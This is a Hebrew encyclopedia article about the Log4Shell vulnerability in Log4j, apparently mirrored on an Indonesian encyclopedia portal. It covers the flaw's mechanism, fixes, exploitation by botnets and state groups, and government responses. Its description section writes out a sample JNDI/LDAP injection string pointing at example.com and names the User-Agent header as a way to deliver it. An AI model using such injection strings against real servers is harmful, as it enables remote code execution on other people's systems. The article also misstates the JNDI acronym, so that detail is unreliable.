Log4Shell

Log4Shell (קוד: CVE-2021-44228) הוא השם שניתן לחולשה בספרייה Log4j, ספריית לוגים פופולרית של Java, המאפשרת הרצת קוד שרירותי (Remote Code Execution).[1][2] פגיעה זו, שלא הבחינו בקיומה מאז 2013 - נחשפה באופן פרטי לקרן התוכנה אפאצ'י, ש-Log4j הוא פרויקט שלה, על ידי צוות האבטחה בענן של קבוצת עליבאבא ב-24 בנובמבר 2021, ונחשפה בפומבי ב-9 בדצמבר 2021.[3][4][5][6]

קרן Apache העניקה ל-Log4Shell דירוג חומרת CVSS של 10, הגבוה ביותר האפשרי.[7] ההערכה היא שהפגיעות משפיעה על מאות מיליוני מכשירים.[6]

החולשה מנצלת את היכולת של Log4j המאפשרת בקשות לשרתי LDAP ו-JNDI שרירותיים, מבלי לבדוק את התגובות.[1][8][9] בקשות אלו מאפשרות לתוקפים להריץ קוד Java שרירותי בשרת או במחשב אחר, או להדליף מידע רגיש.[5]

שירותים רבים התגלו כפגיעים לחולשה, ורשימה של פרויקטי התוכנה המושפעים פורסמה על ידי צוות האבטחה של Apache.[10] השירותים המסחריים המושפעים כוללים את AWS,[11] Cloudflare, iCloud,[12] Minecraft: Java Edition,[13] סטים Tencent QQ ועוד רבים אחרים.[8][14][15]

Log4Shell היא אחת מהחולשות החמורות ביותר שהתגלו מעולם. חברת LunaSec אפיינה את הפגיעות כ"כשל עיצובי בעל פרופורציות קטסטרופליות",[5] חברת Tenable אמרה כי החולשה הייתה "הפגיעות הגדולה והקריטית ביותר אי פעם",[16] ו- Ars Technica כינתה זאת "ללא ספק הפגיעה החמורה ביותר אי פעם".[17]

רקע

ערך מורחב – Log4j

Log4j היא ספריית קוד פתוח המאפשרת למפתחי תוכנה לרשום (log) נתונים בתוך האפליקציות שלהם. נתונים אלה יכולים לכלול קלט משתמש.[18] הספרייה נמצאת בשימוש כמעט בכל מקום ביישומי Java, במיוחד בתוכנות ארגוניות.[5]

הספרייה נכתבה במקור בשנת 2001 על ידי Ceki Gülcü, וכעת היא חלק מ- Apache Logging Services, פרויקט של קרן התוכנה אפאצ'י.[19] חבר בוועדת אבטחת הסייבר לשעבר של הנשיא ברק אובמה, טום קלרמן, תיאר את אפאצ'י כ"אחת התומכות הענקיות של גשר המאפשר את רקמת החיבור בין עולמות היישומים וסביבות המחשב".[20]

תיאור

ממשק ה-JNDI של Java (בראשי תיבות: ה-Java Native Direcotry Interface), מאפשר חיפוש של אובייקטי Java בזמן ריצה בהינתן כתובת למקום שמאחסן את הנתונים שלהם. JNDI יכול לעבוד עם מספר ממשקי Directory, כאשר כל אחד מספק "סכימה" שונה של חיפוש קבצים. בין הממשקים הללו ניתן למצוא את LDAP, המאחזר את נתוני האובייקט ככתובת URL משרת מתאים, מקומי או מכל מקום באינטרנט.[21]

בקונפיגורציה הרגילה, כאשר log4j כותבת הודעת לוג, מתבצעת פעולת חיפוש והחלפה של מחרוזות מיוחדות מהצורה {prefix:name}$ בתוך ההודעה הנכתבת. חלק מהתבניות המיוחדות שיכולות להיות מזוהות היא הצורה{<jndi:<lookup}$; על ידי הכנסת מחרוזת כזו עם שרת lookup בשליטת התוקף (מסוג LDAP, למשל), הספרייה תפנה לכתובת ה-URL הרשומה באמצעות פרוטוקול ה-LDAP ותטען את הנתונים בו כאובייקטי Java. כך לדוגמה, ניסיון הדפסה של המחרוזת {jndi:ldap://example.com/file}$, יגרור טעינה של הקוד שמאוחסן בכתובת זו, גם אם מדובר בשרת חיצוני.

משום שבקשות HTTP נכתבות פעמים רבות ללוג, וקטור תקיפה נפוץ הוא הכנסה של המחרוזת הזדונית לתוך HTTP Header שמתועד פעמים רבות, כגון User-Agent.

מניעה

התיקון עבור פגיעות אלו פורסמו ב-6 בדצמבר 2021, שלושה ימים לפני פרסום הפגיעות, בגרסה 2.15.0-rc1 של Log4j.[22] התיקון כלל הגבלת השרתים והפרוטוקולים שניתן להשתמש בהם לצורך חיפושים (lookups) של אובייקטים. לאחר מכן חוקרים גילו באג קשור, CVE-2021-45046, המאפשר הרצת קוד בצורה מקומית או מרוחקת בתצורות מסוימות שאינן ברירת מחדל. באג זה תוקן בגרסה 2.16.0, אשר השביתה את כל תכונות ה-JNDI ואת תמיכה בחיפושי הודעות (message lookups).[23][24]

עבור גרסאות קודמות, מומלץ להסיר את המחלקה org.apache.logging.log4j.core.lookup.JndiLookup ממשתנה ה-classpath כדי למנוע ניצול של שתי הפגיעויות.[7][23] בנוסף, ניתן לשנות את ה-system property בשם log4j2.formatMsgNoLookups ל- true, אך שינוי זה אינו מונע ניצול של CVE-2021-45046.[23]

גרסאות חדשות יותר של Java Runtime Environment (JRE) מפחיתות את הפגיעות הזו על ידי חסימת טעינת קוד מרחוק כברירת מחדל, אם כי וקטורי תקיפה אחרים עדיין קיימים ביישומים מסוימים.[1][25][26] פורסמו מספר שיטות וכלים כדי לסייע בזיהוי של שימוש בגרסאות log4j פגיעות בחבילות Java.[27]

ניצול

החולשה מאפשרת להאקרים להשיג שליטה על מכשירים פגיעים באמצעות Java.[6] ההאקרים משתמשים בפגיעות כדי לנצל את היכולות של מכשירי הקורבנות; השימושים כוללים כריית מטבעות קריפטוגרפיים, יצירת רשתות בוטים, שליחת דואר זבל ופעילויות לא חוקיות אחרות כגון התקפות כופר.[6][28] בימים שלאחר פרסום הפגיעות, חברת צ'ק פוינט עקבה אחרי מיליוני התקפות שיזמו האקרים, כאשר כמה חוקרים צפו בקצב של למעלה ממאה התקפות לדקה, שהביא בסופו של דבר לתוצאה של מעל 40% מהרשתות העסקיות בעולם שהותקפו.[6][20]

לדברי מנכ"ל Cloudflare, מתיו פרינס, עדויות לשימוש או בדיקה להימצאות של החולשה נצפו כבר ב-1 בדצמבר, תשעה ימים לפני שהחולשה נחשפה בפומבי.[29] בנוסף, לדברי GreyNoise, חברת אבטחה מקוונת, מספר כתובות IP כבר סרקו אתרים במקרה למצוא שרתים פגיעים.[30] כמה botnets התחילו לסרוק את הפגיעות, כולל Muhstik botnet, כמו גם "מיראי", צונאמי ו-XMRig.[6][29][31] כמה קבוצות מדינתיות בסין ובאיראן ניצלו את הפגיעות, לפי צ'ק פוינט.[16]

תגובה והשפעה

ממשלות

בארצות הברית, מנהל הסוכנות לאבטחת סייבר ותשתיות (CISA), ג'ן איסטרלי, תיאר את החולשה כ"אחת הרציניות שראיתי בכל הקריירה שלי, אם לא החמורה ביותר", והסביר כי מאות מיליוני מכשירים הושפעו תוך שהוא מייעץ לספקים לתעדף עדכוני תוכנה.[32][6][28]

המרכז הקנדי לאבטחת סייבר (CCCS) קרא לארגונים לנקוט בפעולה מיידית.[33] סוכנות ההכנסה של קנדה סגרה זמנית את השירותים המקוונים שלה לאחר שנודע על החולשה, בעוד שממשלת קוויבק סגרה כמעט 4,000 מאתרי האינטרנט שלה כ"צעד מונע".[34]

המשרד הפדרלי לביטחון מידע הגרמני (BSI) הגדיר את החולשה כרמת האיום הגבוהה ביותר של הסוכנות, וכינה אותה "מצב איום קריטי ביותר" (מתורגם). הארגון גם דיווח כי מספר התקפות כבר היו מוצלחות וכי עדיין קשה להעריך את היקף הניצול.[35][36] מרכז אבטחת הסייבר הלאומי של הולנד (NCSC) החל ברשימה מתמשכת של יישומים פגיעים.[37][38]

עסקים

חברת ניהול משאבי אנוש וניהול כוח אדם, UKG, אחד העסקים הגדולים בתעשייה, הייתה מטרה למתקפת כופר שהשפיעה על עסקים גדולים.[17][39] UKG מסרה כי אין לה ראיות לניצול של Log4Shell בתקרית, אם כי האנליסט אלן ליסקה מחברת אבטחת הסייבר Recorded Future אמר כי ייתכן שיש קשר.[39] כאשר חברות גדולות יותר החלו לשחרר תיקונים לחולשה, הסיכון לעסקים קטנים גדל כאשר האקרים התמקדו ביעדים פגיעים יותר.[28]

ראו גם

קישורים חיצוניים

הערות שוליים

  1. ^ 1 2 3 Wortley, Free; Thrompson, Chris; Allison, Forrest (9 בדצמבר 2021). "Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package". LunaSec (באנגלית). נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  2. ^ "CVE-2021-44228". Common Vulnerabilities and Exposures. נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  3. ^ Povolny, Steve; McKee, Douglas (10 בדצמבר 2021). "Log4Shell Vulnerability is the Coal in our Stocking for 2021". McAfee (באנגלית). נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  4. ^ "Worst Apache Log4j RCE Zero day Dropped on Internet". Cyber Kendra. 9 בדצמבר 2021. נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  5. ^ 1 2 3 4 Newman, Lily Hay (10 בדצמבר 2021). "'The Internet Is on Fire'". Wired (באנגלית אמריקאית). ISSN 1059-1028. נבדק ב-12 בדצמבר 2021. {{cite news}}: (עזרה)
  6. ^ 1 2 3 4 5 6 7 Murphy, Hannah (2021-12-14). "Hackers launch more than 1.2m attacks through Log4J flaw". Financial Times. נבדק ב-2021-12-17.
  7. ^ 1 2 "Apache Log4j Security Vulnerabilities". Log4j. Apache Software Foundation. נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  8. ^ 1 2 Mott, Nathaniel (10 בדצמבר 2021). "Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit". PC Magazine (באנגלית). נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  9. ^ Goodin, Dan (10 בדצמבר 2021). "Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet". Ars Technica (באנגלית אמריקאית). נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  10. ^ "Apache projects affected by log4j CVE-2021-44228". 14 בדצמבר 2021. {{cite web}}: (עזרה)
  11. ^ "Update for Apache Log4j2 Issue (CVE-2021-44228)". Amazon Web Services. 12 בדצמבר 2021. נבדק ב-13 בדצמבר 2021. {{cite web}}: (עזרה)
  12. ^ Lovejoy, Ben (14 בדצמבר 2021). "Apple patches Log4Shell iCloud vulnerability, described as most critical in a decade". 9to5mac. {{cite web}}: (עזרה)
  13. ^ "Security Vulnerability in Minecraft: Java Edition". Minecraft. Mojang Studios. נבדק ב-13 בדצמבר 2021. {{cite web}}: (עזרה)
  14. ^ Goodin, Dan (10 בדצמבר 2021). "The Internet's biggest players are all affected by critical Log4Shell 0-day". ArsTechnica. נבדק ב-13 בדצמבר 2021. {{cite web}}: (עזרה)
  15. ^ Rundle, David Uberti and James (15 בדצמבר 2021). "What Is the Log4j Vulnerability?". {{cite web}}: (עזרה)
  16. ^ 1 2 Barrett, Brian. "The Next Wave of Log4J Attacks Will Be Brutal". Wired (באנגלית אמריקאית). ISSN 1059-1028. נבדק ב-2021-12-17.
  17. ^ 1 2 Goodin, Dan (2021-12-13). "As Log4Shell wreaks havoc, payroll service reports ransomware attack". Ars Technica (באנגלית אמריקאית). נבדק ב-2021-12-17.
  18. ^ Yan, Tao; Deng, Qi; Zhang, Haozhe; Fu, Yu; Grunzweig, Josh (10 בדצמבר 2021). "Another Apache Log4j Vulnerability Is Actively Exploited in the Wild (CVE-2021-44228)". Unit 42. Palo Alto Networks. {{cite web}}: (עזרה)
  19. ^ "Apache Log4j 2". Apache Software Foundation. נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  20. ^ 1 2 Byrnes, Jesse (2021-12-14). "Hillicon Valley — Apache vulnerability sets off alarm bells". TheHill (באנגלית). נבדק ב-2021-12-17.
  21. ^ Graham-Cumming, John (10 בדצמבר 2021). "Inside the Log4j2 vulnerability (CVE-2021-44228)". The Cloudflare Blog (באנגלית). נבדק ב-13 בדצמבר 2021. {{cite web}}: (עזרה)
  22. ^ "Restrict LDAP access via JNDI by rgoers #608". Log4j (באנגלית). 5 בדצמבר 2021. נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  23. ^ 1 2 3 "CVE-2021-45046". Common Vulnerabilities and Exposures. 15 בדצמבר 2021. נבדק ב-15 בדצמבר 2021. {{cite web}}: (עזרה)
  24. ^ Greig, Jonathan (14 בדצמבר 2021). "Second Log4j vulnerability discovered, patch already released". ZDNet (באנגלית). נבדק ב-17 בדצמבר 2021. {{cite web}}: (עזרה)
  25. ^ Ducklin, Paul (12 בדצמבר 2021). "Log4Shell explained – how it works, why you need to know, and how to fix it". Naked Security. Sophos. נבדק ב-12 בדצמבר 2021. {{cite web}}: (עזרה)
  26. ^ "Exploiting JNDI Injections in Java". Veracode. 2019-01-03. נבדק ב-2021-12-15.
  27. ^ "Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228)". www.lunasec.io (באנגלית). 13 בדצמבר 2021. נבדק ב-13 בדצמבר 2021. {{cite web}}: (עזרה)
  28. ^ 1 2 3 Woodyard, Chris. "'Critical vulnerability': Smaller firms may find it harder to stop hackers from exploiting Log4j flaw". USA Today (באנגלית אמריקאית). נבדק ב-2021-12-17.
  29. ^ 1 2 Duckett, Chris. "Log4j RCE activity began on 1 December as botnets start using vulnerability". ZDNet (באנגלית). נבדק ב-13 בדצמבר 2021. {{cite web}}: (עזרה)
  30. ^ "Exploit activity for Apache Log4j vulnerability - CVE-2021-44228". Greynoise Research. 10 בדצמבר 2021. נבדק ב-14 בדצמבר 2021. {{cite web}}: (עזרה)
  31. ^ Zugec, Martin (13 בדצמבר 2021). "Technical Advisory: Zero-day critical vulnerability in Log4j2 exploited in the wild". Business Insights. Bitdefender. {{cite web}}: (עזרה)
  32. ^ "Statement from CISA Director Easterly on "Log4j" Vulnerability". CISA. 11 בדצמבר 2021. {{cite web}}: (עזרה)
  33. ^ "Statement from the Minister of National Defence on Apache Vulnerability and Call to Canadian Organizations to Take Urgent Action". Government of Canada (באנגלית). 12 בדצמבר 2021. {{cite web}}: (עזרה)
  34. ^ Cabrera, Holly (12 בדצמבר 2021). "Facing cybersecurity threats, Quebec shuts down government websites for evaluation". CBC News. נבדק ב-12 בדצמבר 2021. {{cite news}}: (עזרה)
  35. ^ Sauerwein, Jörg (12 בדצמבר 2021). "BSI warnt vor Sicherheitslücke". Tagesschau (בגרמנית). {{cite web}}: (עזרה)
  36. ^ "Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage" [Red alarm: Log4Shell vulnerability causes extremely critical threat situation] (הודעה לעיתונות) (בגרמנית). Federal Office for Information Security. 11 בדצמבר 2021. {{cite press release}}: (עזרה)
  37. ^ J. Vaughan-Nichols, Steven (14 בדצמבר 2021). "Log4Shell: We Are in So Much Trouble". The New Stack. {{cite web}}: (עזרה)
  38. ^ "NCSC-NL/log4shell". National Cyber Security Centre (Netherlands). נבדק ב-14 בדצמבר 2021. {{cite web}}: (עזרה)
  39. ^ 1 2 Bray, Hiawatha (15 בדצמבר 2021). "Emerging 'Log4j' software bug spawns worldwide worry over cyber attacks - The Boston Globe". The Boston Globe (באנגלית אמריקאית). נבדק ב-2021-12-17. {{cite web}}: (עזרה)
Index: pl ar de en es fr it arz nl ja pt ceb sv uk vi war zh ru af ast az bg zh-min-nan bn be ca cs cy da et el eo eu fa gl ko hi hr id he ka la lv lt hu mk ms min no nn ce uz kk ro simple sk sl sr sh fi ta tt th tg azb tr ur zh-yue hy my ace als am an hyw ban bjn map-bms ba be-tarask bcl bpy bar bs br cv nv eml hif fo fy ga gd gu hak ha hsb io ig ilo ia ie os is jv kn ht ku ckb ky mrj lb lij li lmo mai mg ml zh-classical mr xmf mzn cdo mn nap new ne frr oc mhr or as pa pnb ps pms nds crh qu sa sah sco sq scn si sd szl su sw tl shn te bug vec vo wa wuu yi yo diq bat-smg zu lad kbd ang smn ab roa-rup frp arc gn av ay bh bi bo bxr cbk-zam co za dag ary se pdc dv dsb myv ext fur gv gag inh ki glk gan guw xal haw rw kbp pam csb kw km kv koi kg gom ks gcr lo lbe ltg lez nia ln jbo lg mt mi tw mwl mdf mnw nqo fj nah na nds-nl nrm nov om pi pag pap pfl pcd krc kaa ksh rm rue sm sat sc trv stq nso sn cu so srn kab roa-tara tet tpi to chr tum tk tyv udm ug vep fiu-vro vls wo xh zea ty ak bm ch ny ee ff got iu ik kl mad cr pih ami pwn pnt dz rmy rn sg st tn ss ti din chy ts kcg ve
Prefix: a b c d e f g h i j k l m n o p q r s t u v w x y z 0 1 2 3 4 5 6 7 8 9

Portal di Ensiklopedia Dunia

Portal : Agama
Agama
Portal : Bahasa
Bahasa
Portal : Biografi
Biografi
Portal : Budaya
Budaya
Portal : Ekonomi
Ekonomi
Portal : Elektronika
Elektronika
Portal : Film
Film
Portal : Filsafat
Filsafat
Portal : Geografi
Geografi
Portal : Indonesia
Indonesia
Portal : Ilmu
Ilmu
Portal : Lingkungan
Lingkungan
Portal : Masyarakat
Masyarakat
Portal : Matematika
Matematika
Portal : Militer
Militer
Portal : Mitologi
Mitologi
Portal : Musik
Musik
Portal : Olahraga
Olahraga
Portal : Pendidikan
Pendidikan
Portal : Politik
Politik
Portal : Sastra
Sastra
Portal : Sejarah
Sejarah
Portal : Seni
Seni
Portal : Teknologi
Teknologi

Kembali kehalaman sebelumnya